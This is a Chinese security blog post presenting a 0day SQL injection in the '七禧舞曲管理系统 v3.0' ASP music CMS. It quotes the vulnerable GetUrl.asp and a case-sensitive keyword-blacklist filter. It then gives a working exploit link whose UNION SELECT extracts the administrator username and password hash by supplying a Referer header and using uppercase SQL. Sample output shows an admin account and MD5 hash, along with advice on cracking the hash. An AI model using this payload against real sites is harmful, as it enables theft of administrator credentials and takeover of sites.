七禧舞曲管理系统 v3.0 0day分析

2010, January 24, 9:58 AM. 漏洞分析
Submitted by admin

<!--#Include File="CmsDj.Conn.asp"-->
<!--#Include File="CmsDj.Function.asp"-->
<%
From_url = Cstr(Request.ServerVariables("HTTP_REFERER"))
Serv_url = Cstr(Request.ServerVariables("SERVER_NAME"))
If mid(From_url,8,len(Serv_url)) <> Serv_url Then    //判断REFERER
     Response.Write "不支持外部链接!"
     Response.End
End If
id=SafeRequest("id","get")    //获取参数id
ac=SafeRequest("ac","get")    //获取 ac
   Set CmsDjMusic = New CmsDj_Com_Dj
   Set CmsDjServer = New CmsDj_Com_Server
   Set Rs = CmsDjMusic.GetRs("CD_ID,CD_Url,CD_Server,CD_Singer,CD_Name,CD_ClassID",0,"CD_ID="&ID)    //id带入 SQL
        If rs.EOF And rs.BOF Then
             Response.write " "
             Response.End

Else
             If Rs("CD_Server")<>0 Then
                  Set RsServer = CmsDjServer.GetRs("CD_Url",0,"CD_ID="&Rs("CD_Server"))
                       PlayUrl = RsServer("CD_Url")&Rs("CD_Url")
                  Set RsServer = Nothing
             Else
                  PlayUrl = Rs("CD_Url")
             End If
        End If
        CD_Url=LCase(Rs("CD_Url"))
        If left(CD_Url,18)="http://www.rayfile" Then
             HttpUrl=CD_Url
             CmsDj_Com_RayFileA = GetHttpPage(HttpUrl,"utf-8")
             CmsDj_Com_RayFileB=GetBody(CmsDj_Com_RayFileA,"<div class=""btn_indown_zh-cn""><a href=""","""></a></div><div id=""divsavetomyfile""",False,False)
             CmsDj_Com_RayFileC = GetHttpPage(CmsDj_Com_RayFileB,"utf-8")
             PlayUrl=GetBody(CmsDj_Com_RayFileC,"var downloads_url = ['","'];",False,False)
        End If
        If ac="lplay" Then
             Response.Write "var i"&rs("CD_ID")&"="""&rs("CD_ID")&""";var s"&rs("CD_ID")&"="""&rs("CD_Singer")&""";var n"&rs("CD_ID")&"="""&rs("CD_Name")&""";var u"&rs("CD_ID")&"="""&PlayUrl&""";var t"&rs("CD_ID")&"="""&rs("CD_ClassID")&""";"    //打印内容
        Else
             Response.write PlayUrl
        End If
   Set Rs = Nothing
%>
SafeRequest 函数 代码:
Function SafeRequest(Key,Modes)
        Dim ParaValue,strFilter,FilterArr,i
        Select Case Lcase(Modes)
                Case "get"
                        ParaValue=Trim(Request.QueryString(Key))
                Case "post"
                        ParaValue=Trim(Request.Form(Key))
                Case "auto"
                        ParaValue=Trim(Request(Key))
        End Select
        IF IsNum(ParaValue) Then
                SafeRequest=ParaValue
                Exit Function
        Else     //如果获取的参数值不为数字  ,这检查是否包含以下关键字
            strFilter="'|and|(|)|exec|insert|select|delete|update|*|chr|mid|master|truncate|declare"  
                FilterArr=Split(strFilter,"|")
                For i=0 To Ubound(FilterArr)
                        IF Instr(ParaValue,FilterArr(i))>0 Then
                                ParaValue=ReplaceStr(ParaValue,FilterArr(i),DBC2SBC(FilterArr(i),0))
                        End IF
                Next
                SafeRequest=ParaValue
        End IF
        SafeRequest = FilterScript(SafeRequest)
End Function
但却没有考虑大小写,同时判断了REFERER,只要带上REFERER同时大小写下sql语句就行了
exp:
javascript:document.write("<a href='/include/GetUrl.asp?ac=lplay&id=-1 Union Select CD_AdminUserName,CD_AdminPassWord,null,4,5,6 From CmsDj_Admin'>Click me</a>");void(0);



var iadmin="admin";var sadmin="4";var nadmin="5";var uadmin="1bfb4b8ad622424eb8302ae5d622424eb8302ae5";var tadmin="6";



其中iadmin=后面是帐号,uadmin="后面是md5,注意md5只取前16位破解就行了

来源:16system.cn

« 上一篇 | 下一篇 »

只显示10条记录相关文章
一次渗透中的上传漏洞分析 (浏览: 8554, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):